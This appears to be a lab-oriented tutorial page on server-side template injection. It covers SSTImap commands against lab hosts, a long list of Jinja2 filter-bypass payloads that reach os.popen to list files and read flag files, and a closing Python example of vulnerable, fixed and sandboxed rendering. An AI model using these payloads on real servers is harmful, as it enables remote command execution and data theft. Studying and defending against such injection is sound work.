Server Side Template Injection (SSTI)
Description
Server Side Template Injection (SSTI) is a vulnerability that occurs when an application embeds user-controlled input directly into a template that the template engine then compiles, so attacker-supplied template syntax is evaluated on the server. This can lead to the execution of unauthorized code on the server.
Automation
SSTImap is a tool designed to automate the testing and exploitation of SSTI vulnerabilities in various template engines. It is hosted on GitHub and provides a framework for identifying template injection flaws.
If you are using AttackBox, the tool is installed in the /opt/SSTImap directory. If you are using your own machine, you can install it by cloning the repository from GitHub and setting up the environment. Follow these steps to get started:
Install the tool:
git clone https://github.com/vladko312/SSTImap.git
cd SSTImap
pip install -r requirements.txt
Run the tool:
python3 sstimap.py -X POST -u 'http://ssti.thm:8002/mako/' -d 'page='
You can craft more complex payloads and customize the request to match the target, for example by supplying a full POST body and a session cookie:
python3 sstimap.py --url http://ssti.thm:8080/admin/forms/edit/index.php -d "page=views&group_name_6=*&update_views=Update&view_list_sortable__rows=6%7C2&view_list_sortable__new_groups=2&view_list_sortable__deleted_rows=" --cookie "PHPSESSID=c430c21eafbba60b6c7261d69b786763"
Jinja2 SSTI
Jinja2 is a popular template engine for Python. It is used in various web frameworks, such as Flask and Django.
Bypassing SSTI Filters
https://0day.work/jinja2-template-injection-filter-bypasses/
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
{%with a=request|attr("application")|attr((request|attr("args")|attr("get")("unders"),"globals",request|attr("args")|attr("get")("unders"))|join)|attr((request|attr("args")|attr("get")("unders"),"getitem",request|attr("args")|attr("get")("unders"))|join)((request|attr("args")|attr("get")("unders"),"builtins",request|attr("args")|attr("get")("unders"))|join)|attr((request|attr("args")|attr("get")("unders"),"getitem",request|attr("args")|attr("get")("unders"))|join)((request|attr("args")|attr("get")("unders"),"import",request|attr("args")|attr("get")("unders"))|join)('os')|attr('popen')('cat${IFS}/flag*')|attr('read')()%}{%print(a)%}{%endwith%}&unders=__
http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
((request|attr("args")|attr("get")("unders"),"getitem",request|attr("args")|attr("get")("unders"))|join)
((request|attr("args")|attr("get")("unders"),"import",request|attr("args")|attr("get")("unders"))|join)
request.args.get globals=__globals__&getitem=__getitem__&builtins=__builtins__&import=__import__
{%with globals=request|attr("args")|attr("get")("unders")%}{%endwith%}
{%with getitem=request|attr("args")|attr("get")("getitem")%}{%endwith%}
{%with builtins=request|attr("args")|attr("get")("builtins")%}{%endwith%}
{%with import=request|attr("args")|attr("get")("import")%}{%endwith%}
{%with a=request|attr("application")|attr(globals)|attr(getitem)(builtins)|attr(getitem)(import)('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
request.environ
((request.args.usc*2,request.args.class,request.args.usc*2)|join)
{%with e=request|attr("args")|attr("get")("env")%}{%endwith%}
{%with a=request|attr(e)%}
{%print(a)%}{%endwith%}
{%with globals=request|attr("args")|attr("get")("globals")%}{%with getitem=request|attr("args")|attr("get")("getitem")%}{%with builtins=request|attr("args")|attr("get")("builtins")%}{%with import=request|attr("args")|attr("get")("import")%}{%with a=request|attr("application")|attr(globals)|attr(getitem)(builtins)|attr(getitem)(import)('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}&globals=__globals__&getitem=__getitem__&builtins=__builtins__&import=__import__
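The payloads above only work because attacker text becomes the template source itself. As an added example (not from the original page or from SSTImap), the following shows that vulnerable Jinja2 pattern next to the two hardened forms: a constant template that receives user text as data, and a SandboxedEnvironment for features that genuinely must render user-supplied templates.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment


def render_vulnerable(user_input: str) -> str:
    """Anti-pattern: user text is concatenated into the template source,
    so any {{ }} / {% %} it contains is compiled and evaluated."""
    env = Environment(autoescape=True)
    return env.from_string("Hello " + user_input).render()


def render_fixed_template(user_input: str) -> str:
    """Fix: the template is a constant and user text is passed as context.
    Jinja2 never re-parses variable values, so {{7*7}} stays literal."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(template_text: str) -> str:
    """Defence in depth for features that must accept user templates:
    SandboxedEnvironment refuses underscore-prefixed attributes such as
    __globals__ and __builtins__, which the bypass payloads above spell
    with \\x5f escapes or assemble with |join to evade string filters."""
    env = SandboxedEnvironment(autoescape=True)
    return env.from_string(template_text).render()


def sandbox_blocks(template_text: str) -> bool:
    """True if the sandbox raises SecurityError for this template."""
    try:
        render_sandboxed(template_text)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    probe = "{{7*7}}"  # constructed harmless probe string, not a real payload
    print(render_vulnerable(probe))        # Hello 49      -> input was compiled
    print(render_fixed_template(probe))    # Hello {{7*7}} -> input treated as data
    print(sandbox_blocks("{{ ''.__class__.__base__ }}"))  # True
```

The sandbox is a second layer, not a substitute for the first fix: keep user input out of template source wherever the feature allows it.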